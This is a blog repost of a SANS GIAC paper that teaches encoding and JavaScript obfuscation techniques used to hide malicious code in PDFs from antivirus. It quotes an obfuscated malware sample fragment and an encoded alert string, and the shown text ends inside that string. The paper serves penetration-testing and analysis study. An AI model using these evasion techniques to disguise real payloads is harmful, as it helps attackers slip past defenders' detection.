Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1411083
  • 博文数量: 416
  • 博客积分: 13005
  • 博客等级: 上将
  • 技术积分: 3297
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-05 16:26
文章分类

全部博文(416)

文章存档

2014年(1)

2013年(4)

2012年(46)

2011年(64)

2010年(12)

2009年(4)

2008年(40)

2007年(187)

2006年(58)

分类: 网络与安全

2012-12-15 10:04:48

SANS Institute
InfoSec Reading Room
This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.


PDF Obfuscation - A Primer
Obfuscation is widely used to attempt to hide malicious intent. There are a veriety of automatic tools
available to both obfuscate and deobfuscate code. What happens when automatic methods fail? What if you wish
to create a malicious PDF for targeted use to subvert antivirus at a hardened client? Understanding
obfuscation fundamentals will help you to both customize attack auto-generated PDFs as well as write custom
PDFs as needed. What follows is an introduction to a variety of obfuscation techniques used by attackers...


Interested in learning
more about security?
SANS Institute
InfoSec Reading Room
This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.
PDF Obfuscation - A Primer
Obfuscation is widely used to attempt to hide malicious intent. There are a veriety of automatic tools
available to both obfuscate and deobfuscate code. What happens when automatic methods fail? What if you wish
to create a malicious PDF for targeted use to subvert antivirus at a hardened client? Understanding
obfuscation fundamentals will help you to both customize attack auto-generated PDFs as well as write custom
PDFs as needed. What follows is an introduction to a variety of obfuscation techniques used by attackers...
Copyright SANS Institute
Author Retains Full Rights
AD©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
[1.0!June!2012]
PDF Obfuscation – A Primer
GIAC (GPEN) Gold Certification
Author:!Chad!Robertson,!chad@rocacon.com
Advisor:!Dennis!Distler
Accepted:!TBA
Abstract
Obfuscation!is!widely!used!to!attempt!to!hide!malicious!intent.!!There!are!a!variety
of!automatic!tools!available to!both!obfuscate!and!deobfuscate!code.!!What!happens!
when!automatic!methods!fail?!!What!if!you!wish!to!create!a!malicious!PDF for!
targeted!use!to!subvert!antivirus!at!a!hardened!client?!!Understanding!obfuscation!
fundamentals will!help!you!to!both!customize!attack!tool!autoOgenerated PDFs!as!
well!as!write!custom!PDFs as!needed.!!What!follows!is!an!introduction!to!a!variety!of!
obfuscation!techniques!used!by!attackers!to!hide!malicious!intent!and!penetrate!
corporate!networks.!
“All!warfare!is!based!on!deception”
OOSun!Tzu,!Art!of!War©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 2
Author!Name,!email@address
Introduction
PDF, or Portable Data Format, is a widely used business file format that is often 
the target of exploitation.  Symantec recently stated in its intelligence report from 2011 
that “PDF files have become the attack vector of choice for targeted attacks” 
(Symantec).   Trend Micro agrees stating that attackers are “using exploits in popular 
software packages (such as PDF) to send malicious documents”  (Trend Micro).  
Over the years, targeted attacks have become more and more sophisticated as a 
result of various defense technologies becoming better at detection.  Trend Micro 
recently said, “Modified versions of this file type have been especially notorious these 
past few months since they are capable of attacking user systems by initially exploiting 
inherent vulnerabilities found in Adobe Reader and Acrobat” (Trend Micro). As with any 
battlefield, each additional defensive strategy results in the attacker altering his offensive 
stance in a slight way to maintain an advantage over his or her adversary.  Thus, an 
understanding of obfuscation techniques has become necessary to thwart detection.
Because of the widespread use of obfuscation, many automated obfuscation tools 
have been developed to aid attackers.  Many publically available tools employ only a 
single method of obfuscation and are written as proof of concept.  Tools such as 
Metasploit offer comprehensive obfuscation techniques but are well understood by 
defenders.  Thus, familiarity with obfuscation techniques allows the attacker to customize 
their attack to avoid detection and gain access to the client network.
The same holds true for deobfuscation applications.  While tools, such as 
jsunpack, are designed as a comprehensive deobfuscation platform, many are designed to 
overcome a single obfuscation technique.  Because of this limitation, their use is only 
valuable in certain cases.  Due to the vast array of possible obfuscation techniques 
available, and with new techniques being discovered constantly, these automated 
deobfuscation tools are sometimes unable to successfully return the obfuscated code to 
human-readable code automatically.  A fundamental understanding of obfuscation can ©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 3
Author!Name,!email@address
help us peel back the multiple layers of obfuscation in use by attackers to gain additional 
insight on how we can better hide our own exploitation techniques.   
The usefulness of defensive technologies such as antivirus and intrusion 
detection/prevention systems, vary greatly from platform to platform.  Some attempt to 
deobfuscate input completely, but care must be taken to not sacrifice performance in 
these cases.  Also, if the PDF is malformed, or the defense application finds artifacts 
outside of specifications, it may ignore them.  An attacker can leverage these anomalies 
to bypass defenses and gain a foothold on the system. 
This paper is divided into three sections.  The first will explore basic number 
encoding techniques used in obfuscation,  Next we will explore programmatic methods of 
obfuscation.  Finally, we will create a PDF with embedded malicious javascript and 
compare various techniques explored to bypass antivius. 
Due to the massive amount of information available about various obfuscation 
techniques, this paper should be considered only a primer.  The reader is encouraged to 
use this paper as a starting point on which to base their pursuit of obfuscation prowess. 
1. Numeric Obfuscation Techniques
1.1. Ba*** Encoding
Ba*** encoding, X being a variable positive integer, is a form of positional notation.  
“Positional notation is a method of representing or encoding numbers.”  (Wikipedia). The 
base notation that readers are most likely familiar with is base10.  “In mathematical 
numeral systems, the base is usually the number of unique digits, including zero, that a 
positional numeral system uses to represent numbers”  (Wikipedia).  
For!example,!base10!uses!the!digits!0!through!9!to!represent!numbers.!!If!
counting!0!through!9,!the!number!that!follows!9!(9+1)!is!not!a!new,!unique!symbol.!!
Instead,!9+1!is!represented!by!starting!again!at!zero!and!shifting!that!representation!
to!the!left!a!single!digit!(10).!!Thus,!the!linear!mathematical!range!between!8!and!9!is!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 4
Author!Name,!email@address
equal!to!the!linear!mathematical!range!between!9!and!10.!!This!example,!of!course,!
excludes nonOlinear!mathematical!scales!(logarithmic,!etc.).
1.2. Base64 Encoding
“Base64!encoding!schemes!are!commonly!used!when!there!is!a!need!to!encode!
binary!data!that!need!to!be!stored!and!transferred!over!media!that!are!designed!to!
deal!with!textual!data.!This!is!to!ensure!that!the!data!remain!intact!without!
modification!during!transport.” (Wikipedia)!!
The!base64!Wikipedia!article!does!an!excellent!job!describing!base64!
conversion.!!We!will!begin!by!exploring!the!example!there!and!then!expand!upon!it!
later!within!this!section.
The!base64!encoded!word!“Man”!is!“TWFu”.!!To!base64!encode!the!word!“Man”,!
we!begin!by!determining!the!related!ASCII!8Obit!values!for!each!letter.!!
M!=!77
a!=!97
n!=!110
Those!values!can!then!be!represented!as!8Obit!binary!
01001101!=M!
01100001!=!a
01101110!=!n
Since!base64!breaks!binary!into!6!bit!groups!(6!bits!have!a!maximum!of!
26
= 64!different!binary!values)!(Wikipedia) we!need!to!group!our!binary!a!bit!
differently.!The!easiest!way!to!see!that!is!to!connect!them!linearly!and!then!
redistribute!into!6Obit!groups.
010011010110000101101110!
Is!thus!represented!as:©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 5
Author!Name,!email@address
010011
010110
000101
101110
Each!of!those!values!are!then!recalculated!in!decimal:
010011!=!(0!x!2^5)!+!(1!x!2^4)!+!(0!x!2^3)!+!(0!x!2^2)!+!(1!x!2^1)!+!(1!x!2^0)!=!19
and!then!compared!to!the!base64!index!table!in!appendix!A.
1.2.1. Padding
“Special!processing!is!performed!if!fewer!than!24!bits!are!available!at!the!end!
of!the!data!being!encoded.!!A!full!encoding!quantum!is!always!completed!at!the!end!
of!a!quantity.!!When!fewer!than!24!input!bits!are!available!in!an!input!group,!no!
additional!bits!are!added!(on!the!right)!to!form!an!integral!number!of!6Obit!groups.!!
Padding!at!the!end!of!the!data!is!performed!using!the!‘=’!character“!!(Internet!
Engineering!Task!Force).!!
To!see!this!in!action,!consider!the!following!example.!!Above,!we!explored!
encoding!‘Man’!into!base64.!!The!result!was!TWFu.!!How!would!we!encode!the!letter!
‘M’!only?!!The!answer,!“TQ==’!will!be!explored!below.!!
Let’s!begin!by!reviewing!the!binary!representation!of!that!character.
01001101 =M!
If!each!character!is!a!byte,!and!we!need!to!separate!those!bytes!into!6!byte!
groups,!we!find!the!following:!010011 and!01.!!010011!equates!to!19,!or!(0!x!2^5)!+!
(1!x!2^4)!+!(0!x!2^3)!+!(0!x!2^2)!+(1!x!2^1)!+(1!x 2^0).!!The!remaining!bytes,!01,!are!
then!padded!to!complete!the!minimum!6Obyte!requirement:!010000.!!The!result!is!
16,!or!(0!x!2^5)!+!(1!x!2^4)!+!(0!x!2^3)!+!(0!x!2^2)!+(0!x!2^1)!+(0!x!2^0).!Looking!in!
the!base64!index!we!see!16!is!mapped!to!the!character ‘Q’.!!The!each!remaining!8!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 6
Author!Name,!email@address
bytes!required!to!fulfill!the!minimum!24!bytes!are!padded!by!using!the!‘=’!character.!!
Thus,!‘M’!is!encoded!to!base64!as!‘TQ==’.
1.3. ASCII Encoding
“ASCII,!or,!the!American!Standard!Code!for!Information!Interchange!is!a!
character!encoding!scheme!originally!based!on!the!English!alphabet” (Wikipedia).!!
ASCII!encoding!is!a!method!of!representing!characters!with!base2!(binary)!strings.!!
These!strings can!then!be!further!converted!to!other!formats!as!needed!
(hexadecimal,!base64,!etc).!!
(Source:!)
In!the!table!above!we!can!see!that!the!columns!represent!bits!7,!6!and!5!
(0000000)!and!the!rows!represent!bits!4,!3,!2,!and!1!(0000000).!!Thus,!using!the!
table!above!we!will!demonstrate!how!characters!can!be!encoded!below (with!a!
leading!zero!added!for!clarity).©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 7
Author!Name,!email@address
A!=!01000001
R!=!01010010
^!=!01011110
These!binary!values!can!be!converted!to hexadecimal,!octal,!or!decimal!as!
shown!within!appendix!B.!!
1.4. Hexidecimal Encoding
“Hexadecimal!is!a!positional!notation!system!with!a!base!of!16.!!It!uses!sixteen!
distinct!symbols,!most!often!the!symbols!0O9!to!represent!the!values!zero!to!nine,!
and!A, B,!C,!D,!E,!F!(or!alternatively!aOf)!to!represent!values!ten!to!fifteen.!!For!
example,!the!number!2AF3!is!equal,!in!decimal,!to!(2!x!16^3)!+!(10!x!16^2)!+!(15!x!
16^1)!+!(3!x!16^0),!or!10995.” (Wikipedia).!!
“Each!hexadecimal!digit!represents!four!binary!digits!(bits),!and!the!primary!
use!of!hexadecimal!notation!is!a!humanOfriendly!representation!of binaryO
coded values!in!computing!and!digital!electronics.” (Wikipedia)!!
Hexadecimal!to!binary!conversions!can!be!seen!in!the!chart!below.©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 8
Author!Name,!email@address
(Source:!)
To!understand!how!ASCII,!decimal,!and!hexadecimal!work!together,!consider!
the!following!example.!!The!character!A!=!is!assigned!the!decimal!value!of!65!
(ASCII).!!This is!represented!in!binary!as!1000001,!or,!(1!x!2^6)!+!(0!x!2^5)!+!(0!x!
2^4)!+!(0!x!2^3)!+!(0!x!2^2)!+!(0!x!2^1)!+!(1!x!2^0).!!
To!find!the!hexadecimal!representation,!we!need!to!break!that!binary!string!into!
four!bit!groups.!!!100 0001 should!then!be!considered!independently!to!represent!
the!hexadecimal!values.!!Thus,!binary!100 represents!the!first!digit!and!binary!0001
the!second!in!the!two!digit!hexadecimal!equivalent.!!Looking!at!the!table!above!(or!
calculating!it!out),!binary!100 results!in!4,!or!(1!x 2^2)!+!(0!x!2^1)!+!(0!x!2^0)!being!
in!the!leftmost!position!of!the!resulting!hexadecimal!representation.!!Then,!the!
remaining!binary!0001 is!represented!in!hexadecimal!as!1.!!The!final!step!is!to!align!
the!values!linearly!thus!resulting!in!hex!41!(sometimes!noted!as!0x41).!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 9
Author!Name,!email@address
1.5. XOR Operation
“XOR!is!one!type!of!bitwise!operation!used!to!(among!other!things)!obfuscate!
data.!!A!bitwise!operation!operates!on!one!or!more!bit!patterns!or!binary!numerals!
at!the!level!of!their!individual!bits.!!A!bitwise!XOR!takes!two!bit!patterns!of!equal!
length!and!performs!a!logical!exclusive!OR!operation!on!each!pair!of!corresponding!
bits.!!The!result!in!each!position!is!1!if!only!the!first!bit!is!1 or only!the!second!bit!is!
1,!but!will!be!0!if!both!are!0!or!both!are!1.” (Wikipedia).!!
To!see!an!example!of!this,!consider!the!following:
Given!the!binary!strings!01001001!and!00100110,!an!XOR!operation!would!result!in!
01101111.
(Source:!Author!Created)
Any!two!string!combination!can!then!be!used!to!discover!the!remaining!third!string.!!
(Source:!Author!Created)
For!a!practical!example!of!this!calculation,!consider!a!RAIDO5!(redundant!array!
of!independent!disks)!array.!!RAIDO5!requires!a!minimum!of!three!disks!to!facilitate!
the!XOR!calculation!to!achieve!the!“parity”!necessary to!recover!lost!data.!!Because!
of!the!nature!of!the!XOR!operation,!any!two!of!the!three!streams!of!bits!can!be!XOR’d!
to!achieve!the!third!stream.!!As!a!result,!within!a!RAIDO5!array,!any!one!disk!can!be!
lost!and!the!array!can!be!rebuilt!given!the!remaining!two!streams!of!bits.!!With!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 10
Author!Name,!email@address
regards!to!RAIDO5,!the!result!of!the!XOR!operation!is!distributed!across!all!disks!
further!supporting!the!fault!tolerance!of!the!disk!set.!!
2. Programmatic Obfuscation Techniques
2.1. Replace Method
“The!replace!method!in!javascript!returns!a!copy!of!a!string!with!text!replaced!
using!a!regular!expression!or!search!string.” (Microsoft)!!
(Source:!(v=vs.94).aspx)
In!the!example!above,!the!string!“The!batter!hit!the!ball!with!the!bat!and!the!
fielder!caught!the!ball!with!the!glove”!would!be!altered!by!the!replace!function!to!
return!“a!batter!hit!a!ball!with!a!bat!and!a!fielder!caught!a!ball!with!a!glove”.!!
To!apply!this!feature!to!the!topic!of!obfuscation,!consider!how!antivirus!
might!view!a!PDF.!!Antivirus!vendors!must!consider!how!long!it!takes!to!scan!a!file!
and!how!long!a!user!must!wait!for!a!file!to!be!returned.!!Scanning!for!strings!only!is!
much!faster!than!executing!embedded!javascript!and!evaluating!the!resulting!
actions.!!If!a!particular!antivirus!application!only!looks!for!static!artifacts!within!the!
file!it deems!indicative!of!shellcode!then!it!may!miss!seemly!benign!text!that!will!
later!be!transformed!into!usable!code.!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 11
Author!Name,!email@address
To!see!this!in!action,!we!will!take!a!look!at!a!sample!submitted!to!jsunpack!
focusing!on!the!replace!methods!used.
(Source : )
Above we!see!several!replace!methods!in!use.!!A!small!sample!of!the!string!
acted!upon!is!shown!below.!
annot.push([{subject:'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y6dy58y58y5f
y36y64y28y59y49y30y5fy5fy37y5fy43y5fy57y5fy36y5fy62y2cy20y55y6ay6fy77y5fy65
y38y37y52y35y73y38y38y29y7by76y61y72y20y43y6cy5fy5fy67y52y47y6ay6fy20y3d
y20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y79y3
2y48y72y35y32y32y34y5fy5fy4cy20y3dy20y30y3by76y61y72y20y71y5fy66y5fy69y36
y20y3dy20y35y31y32y3b
Putting!the!pieces!together,!we!can!see!the!variable!“s”!is!made!up!of!the!
string!subject!(sub+ject!above).!!Then,!the!replace!method!is!run!on!the!content!of!
the!s!variable!by!s.replace(/[zhyg]/g,!‘%’)!replacing!all!occurrences!of!y!(or!zhg!for!
that!matter)!with!%.!!The!resulting!string!is!converted!from!obfuscated!text!into!
hexadecimal!encoded!text.!!
%0d%0a%0d%0a%09%66%75%6e%63%74%69%6f%6e%20%6d%58%58%5f%36
%64%28%59%49%30%5f%5f%37%5f%43%5f%57%5f%36%5f%62%2c%20%55%
6a%6f%77%5f%65%38%37%52%35%73%38%38%29%7b%76%61%72%20%43%
6c%5f%5f%67%52%47%6a%6f%20%3d%20%61%72%67%75%6d%65%6e%74%
73%2e%63%61%6c%6c%65%65%3b%76%61%72%20%79%32%48%72%35%32
%32%34%5f%5f%4c%20%3d%20%30%3b%76%61%72%20%71%5f%66%5f%69
%36%20%3d%20%35%31%32%3b
Converting!that string!to!text!results!in!the!following!(nonOstring!characters!
removed):
functionAmXX_6d(YI0__7_C_W_6_b,AUjow_e87R5s88){varACl__gRGjoA=A
arguments.callee;varAy2Hr5224__LA=A0;varAq_f_i6A=A512;©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 12
Author!Name,!email@address
2.2. Array Trickery
Another!technique!used!by!malicious!javascript!authors!to!alter!execution!flow!
is!dependent!upon!arrays.!!Arrays!are!a!very!common!programming!construct!used!
to!contain!lists!of!values.!!For!our!purposes,!an!array!is!understood!to!contain!a!
series!of!values!labeled n+1!beginning!at!zero.!!Storing!values!in!arrays,!and!then!
returning!to!a!particular!value!within!that!array!depending!on!the!result!of!other!
variable!functions!allows!for!dynamic!code!execution.!!
For!example,!let!us!take!yet!another!look!at!one!of!Neosploit’s!PDF!obfuscation!
techniques.!!The!malware!authors!use!the!getAnots()!call!to!return!an!array!of!
objects!containing!the!documents!annotations.!!!The!function!getAnots()!returns!
annotations!present!within!the!PDF.!!Annotations!can!be!thought!of!as!stickynotes!
stuck!to!a!particular!PDF.!!The!key!to!the!deobfuscation!routine!is!contained!within!
the!first!annotation.!!If!the!PDF!is!not!opened!within!Adobe!Acrobat!then!the!
javascript!does!not!return!expected!values!and!the!function!will!return!an!alternate!
annotation.!! Therefore,!analysis!external!to!Acroat!Reader!will!be!unsuccessful!
unless!this!behavior!is!considered!and!accommodations!put!into!place.
2.3. No Alnum
In!javascript,!numbers!can!become!strings,!strings!can!become!numbers,!and!
arrays!can!become!strings.!!“Thus,!for!example,![]!in!a!string!context!becomes!"".!""!
in!a!number!context!becomes!0.!If!we!were!to do:!""!O 1!we'd!get!the!number!O1.!
Additionally!if!we!were!to!do![]!O 1!we'd!get!O1.!++!is!also!able!to!coerce!a!string!into!
a!number.”!(jeresig)
Using!this!technique!the!attacker!can!create!a!complex!string!that!will!evaluate!
to!numeric!results!(or!alphanumeric!if,!for!example,!referencing!characters!in!a!
string)!making!this!technique!valuable!for!obfuscation.!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 13
Author!Name,!email@address
Three!simple!examples!are!shown!below.!!!
(Source:!Author!created)
In!the!first!script,!the!test!variable!evaluates!as!1.!!The!second,!the!test!
variable!evaluates!as!2.!!Finally,!the!third!test!variable!evaluates!as!3.!!To!understand!
how!the!first!example,!++[[]][+[]]!evaluates!to!1,!read!on.
Building!upon!the!previous!information,!we!know!that![]!evaluates!as!“”.!!“”,!
in!a!number!context,!becomes!0!if!+!is!present.!!Let’s!apply!those!rules!in!individual!
steps!to!the!string!above.©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 14
Author!Name,!email@address
(Source:!Author!created)
The!final!value!results!in!an!array.!!The!returned!result!is!1.!!Each!other!string!
in!the!example!can!be!evaluated!similarly!to!achieve!similar!results.!!
How!could!this!be!used!to!obfuscate?!!A!returned!numeric!value!could!be!
used!to!refer!to!offset!characters!in!a!seemingly!arbitrary!string!which!is!then!used!
to!craft!additional!code!at!runtime!by!using,!for!example,!String.fromCharCode(X).!!
Similarly,!one!could!add!necessary!characters!to!an!array!and!then!use!this!
technique!to!alter!execution!at!runtime.!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 15
Author!Name,!email@address
The!previous!techniques!are!modest!in!comparison!to!those!available!in!the!
wild.!!A!much!more!extreme!example,!shown!below,!converts!a!simple!javascript!
string!into!an equivalent!alnum!string!containing!40228!characters!total.
“alert("Hello,!JavaScript")”
Could!be!obfuscated!as:
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])
[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[
])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+
!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][
[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[
]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+(
[]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]
)[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+
[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+
[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!
+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]
+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+
[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]
+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]
